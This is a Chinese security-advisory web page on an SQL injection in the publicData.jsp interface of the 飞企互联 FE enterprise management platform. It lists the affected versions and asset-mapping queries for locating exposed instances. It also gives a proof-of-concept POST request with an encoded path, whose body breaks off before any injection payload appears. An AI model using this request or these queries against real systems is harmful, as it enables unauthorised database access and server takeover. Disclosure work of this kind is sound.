探索网络安全新技术
攀登黑客技术最高峰

飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞

漏洞描述

飞企互联-FE企业运营管理平台 publicData.jap 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。

影响范围

version <= V6.6.0

资产测绘

app=”FE-协作平台”

app=”飞企互联-FE企业运营管理平台”

飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞-威武网安

漏洞POC

POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
 
type=getSelectData&
赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞》
文章链接:https://www.wevul.com/6479.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册